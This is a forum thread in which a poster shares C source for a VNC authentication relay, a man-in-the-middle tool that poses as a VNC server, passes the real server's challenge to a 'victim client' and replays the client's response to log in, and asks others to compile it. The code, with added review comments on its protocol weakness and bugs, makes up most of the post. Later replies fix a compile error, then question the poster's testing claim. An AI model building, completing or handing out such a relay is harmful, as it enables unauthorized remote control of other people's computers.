

Please, I tried but I get errors etc. If you can compile it and maybe post the .exe I would be thankful!
By the way Hi everyone i'm new! ^_^
Code:
  1. #include <netinet/in.h>
  2. #include <string.h>
  3. #include <sys/types.h>
  4. #include <sys/socket.h>
  5. #define VNCPORT 5900
  6. #define VNCSERVER "x.x.x.x"
  7. #define QUEUE 8
  8. #define BUFSIZ 512
  9. typedef char rfbProtocolVersionMsg[13];
  10. #define sz_rfbProtocolVersionMsg 12
  /*
   * Single-connection relay for the RFB 3.3 "VNC authentication" exchange.
   * It listens on VNCPORT, accepts one client, connects to VNCSERVER, passes
   * the server's 16-byte challenge to the client and the client's 16-byte
   * response back to the server, then closes all three sockets.
   *
   * What the listing shows for a defender: the exchange proves knowledge of
   * the password to the server, but it gives the client no proof of which
   * server it reached, and the response is not tied to the connection it was
   * produced on. Carrying VNC inside SSH or TLS, with the server's key or
   * certificate verified by the client, closes that gap.
   *
   * NOTE(review): not valid C as posted; see the assignment to buf below.
   */
  11. int main (int argc, char **argv) {
  12. int sockfd, clientfd, vncfd;
  13. int nbytes = 0;
  14. struct sockaddr_in server, client, vnc;
  /* NOTE(review): accept() below takes a socklen_t *, not an int * */
  15. int len = sizeof (client);
  16. char buf [BUFSIZ];
  17. if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) {
  18. perror ("socket");
  19. exit (-1);
  20. }
  21. bzero (&server, sizeof (server) );
  22. server.sin_family = AF_INET;
  23. server.sin_addr.s_addr = htonl (INADDR_ANY);
  24. server.sin_port = htons (VNCPORT);
  25. /* this is the fake VNC server: a listener on every local address, port VNCPORT */
  26. if (bind (sockfd, (struct sockaddr *) &server,
  27.         sizeof (server) ) == -1) {
  28. perror ("bind");
  29. exit (-1);
  30. }
  /* NOTE(review): the return value of listen() is not checked */
  31. listen (sockfd, QUEUE);
  /* only one connection is ever accepted; the program handles a single session */
  32. if ( (clientfd = accept (sockfd,
  33.         (struct sockaddr *) &client, &len) ) == -1) {
  34. perror ("accept");
  35. exit (-1);
  36. }
  37. strcpy (buf, "RFB 003.003\n");
  38. /* we must send VNC version number (from protocol) */
  /* NOTE(review): write() returns a signed count and strlen() an unsigned one,
     so a -1 failure is converted to a large unsigned value and this test does
     not fire; the same comparison is repeated for vncfd further down */
  39. if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) {
  40. perror ("write");
  41. exit (-1);
  42. }
  43. /* we also must read VNC version number (from protocol) */
  44. if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
  45. perror ("read");
  46. exit (-1);
  47. }
  /* NOTE(review): read() may return BUFSIZ, in which case this store lands
     one byte past the end of buf */
  48. buf [nbytes] = 0;
  49. printf ("version -> \%s\n", buf);
  /* The next four stores build the 4-byte big-endian value 2, the RFB 3.3
     security type for VNC (challenge-response) authentication.
     NOTE(review): the first one is not valid C as posted, since an array
     cannot be assigned to; the element index appears to have been lost in the
     forum rendering */
  50. buf
  51. = 0x00;
  52. buf [1] = 0x00;
  53. buf [2] = 0x00;
  54. buf [3] = 0x02;
  55. /* we send the authentication method code to the client */
  56. if (write (clientfd, buf, 4) < 4) {
  57. perror ("write");
  58. exit (-1);
  59. }
  60. if ( (vncfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) {
  61. perror ("socket");
  62. exit (-1);
  63. }
  64. bzero (&vnc, sizeof (vnc) );
  65. vnc.sin_family = AF_INET;
  /* VNCSERVER is the "x.x.x.x" placeholder in the defines above the function */
  66. vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
  67. vnc.sin_port = htons (VNCPORT);
  68. /* we connect to the real VNC server */
  69. if (connect (vncfd, (struct sockaddr *) &vnc,
  70.         sizeof (vnc) ) == -1) {
  71. perror ("connect");
  72. exit (-1);
  73. }
  74. /* again, we read version number from the VNC server */
  /* the bytes read here are overwritten by the strcpy below without being examined */
  75. if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
  76. perror ("read");
  77. exit (-1);
  78. }
  79. strcpy (buf, "RFB 003.003\n");
  80. /* and we send ours */
  81. if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
  82. perror ("write");
  83. exit (-1);
  84. }
  85. /* we now read authentication method code from VNC server */
  /* the value is not inspected; the next read into buf overwrites it */
  86. if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
  87. perror ("read");
  88. exit (-1);
  89. }
  90. /* here is the challenge from server */
  /* NOTE(review): nbytes is not compared with 16 before the first 16 bytes of
     buf are forwarded below */
  91. if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
  92. perror ("read");
  93. exit (-1);
  94. }
  95. /* we send the challenge to the victim client */
  96. if (write (clientfd, buf, 16) < 16) {
  97. perror ("write");
  98. exit (-1);
  99. }
  100. /* we have the encrypted password from the client */
  /* in VNC authentication this is the 16-byte response computed from the
     challenge and the password; the password itself is not sent */
  101. if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
  102. perror ("read");
  103. exit (-1);
  104. }
  105. /* we send the encrypted password to the VNC server */
  106. if (write (vncfd, buf, 16) < 16) {
  107. perror ("write");
  108. exit (-1);
  109. }
  110. /* we read the result from the authentication process */
  /* only the length of the reply is checked; the result value is never
     examined, so the comment after this block states an expectation rather
     than a verified outcome */
  111. if (read (vncfd, buf, BUFSIZ) < 4) {
  112. perror ("read");
  113. exit (-1);
  114. }
  115. /* at this point we should be authenticated */
  116.         /* place whatever code you want here */
  117. close (clientfd);
  118. close (sockfd);
  119. close (vncfd);
  120. return 0;
  121. }

The error is in line 65:
Code:
  1. /* we also must read VNC version number (from protocol) */
  2. if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
  3. perror ("read");
  4. exit (-1);
  5. }
  6. buf [nbytes] = 0;
  7. printf ("version -> \%s\n", buf);
  8. buf
  9. = 0x00;
  10. buf [1] = 0x00;
  11. buf [2] = 0x00;
  12. buf [3] = 0x02;
buf is an array, yet you are trying to assign a byte value to it.  I assume that you meant: buf[0] = 0x00;.  Correct that and it should compile.
Last summer I learned a handy command-line option for vi.  +n will open the edit on line #n.  So when gcc returned an error message for line 65, I ran: vi +65 nick2.c (lacking a name, I just named it after you).


could you compile it for me and maybe send to my email, magicshotgun@hotmail.com plz
I just deleted miracle c workshop because the program generates errors..
plzz i need this program!


"fake server"
"victim client"
What is this code supposed to be doing?  It looks like a "man in the middle" attack in which you are trying to capture the "victim client's" ID and password.
And why did the error baffle you?  It was a very simple error that any beginner C programmer could have handled.
Too many things here make me more than a little suspicious.  Just what is going on?
BTW, executables tend to depend on finding a particular version of shared libraries on the system, so a program compiled on one Linux or UNIX machine would not necessarily run on another.




Yes, it's for VNC. I am trying to test the vulnerability of my server .. I don't want my clients getting hacked, you see.
If it's vulnerable I'm going to have to change to a new tool.. that means passing out the tool to everyone and setting up a new server, which is a lot of work! So if anyone would be so kind as to please compile this so I can get on my way..thanks.


man you don't even know what you're talking about. first off, you have defined the server address as "x.x.x.x"...yeah, good luck resolving that one.  2nd off, you're not testing a vulnerability at all. you're trying to pose as a legitimate VNC server (somehow expecting a random vnc client to contact you?), then trying to shuffle around some auth codes to trick the client into sending you their password.  now someone else correct me if i'm wrong, but this attack doesn't even make sense to me.  why would the client be trying to contact YOUR fake server in the first place?  why wouldn't they access the real server?  maybe if it was on an internal network and you were a man in the middle you could pose as the server, but otherwise i don't even understand the logistics of such an attack, or see how it could possibly be carried out across a WAN..  maybe if you could explain them to us you will get some more help.


infamous, I'm not sure, but if he could get his fake server somehow listed as a legitimate server address, then he could trick someone into connecting to it, whereupon it would appear to the victim that everything is indeed legitimate. (sorry about the length of the sentence; I started out majoring in German)  I can only guess that it would be through email advertising or posting on forums or even on his own web page.
Anyway, I don't see how this program could be a legitimate test of his server's security.
Oh s***!  I just Google'd on VNC!  It's used to control computers remotely.  Definitely not a good sign.  At least VNC passwords go out encrypted.
Besides, why would someone setting up and running a server not have the most basic computer tools and not be able to handle a really simple error message?  It's looking more and more like Nick's a script-kiddie.  Betcha he's running Windows and doesn't even have a clue what platform his source code is for.
BTW Nick, I hope your dog is feeling better.  Our Chihuahua mix also rubs at his ears a lot.


lol... i'm on the search engine? and if you think i'm some kind of script kiddie you're wrong. I work for concordhosting.com and we're testing vnc vulnerability. Now if you're that stupid to miss the exploit news all over those security websites 'with the exploit code' then you got some issues on your hand buddy.
And for infamous you aren't too smart are you?
its defined as x.x.x.x because you change that address later on when you type in the ip address.
You make me laugh.
edit: Also It doesn't host a fake server and wait for people to connect and steal their passwords if thats what you think. It tricks the server you're connecting to into thinking you don't need a password.
also once again how did you find that post I made awhile back?
-Nick


I was wrong about the x.x.x.x sorry infamous.. I was just told you need to put valid ip or you can make it so you can just put it in through msdos





Originally posted by nick2
lol... i'm on the search engine? and if you think i'm some kind of script kiddie you're wrong. I work for concordhosting.com and we're testing vnc vulnerability. Now if you're that stupid to miss the exploit news all over those security websites 'with the exploit code' then you got some issues on your hand buddy.
And for infamous you aren't too smart are you?
its defined as x.x.x.x because you change that address later on when you type in the ip address.
You make me laugh.
edit: Also It doesn't host a fake server and wait for people to connect and steal their passwords if thats what you think. It tricks the server you're connecting to into thinking you don't need a password.
also once again how did you find that post I made awhile back?
-Nick

Let me get this straight.  You work for concordhosting.com which has no programmers.  Nobody there has even the most basic programming tools.  Nobody there is able to read very simple error messages.  What tools you did have you threw out because they give you error messages on code that DOES contain errors.  So you have to go out on the forums begging for something that an ISP's staff and resources could do very easily?  And you don't even understand basic Google'ing?  What's the stock code on that company?  I want to make sure to stay far away from it, because that company's in trouble.
Sorry, but I'm becoming increasingly skeptical about your story.
BTW:
"also once again how did you find that post I made awhile back?"
You've only asked that question this one time.  So where do you get that "once again" from?
Hint: you did provide your email address.
And I honestly do hope that your dog is feeling better.
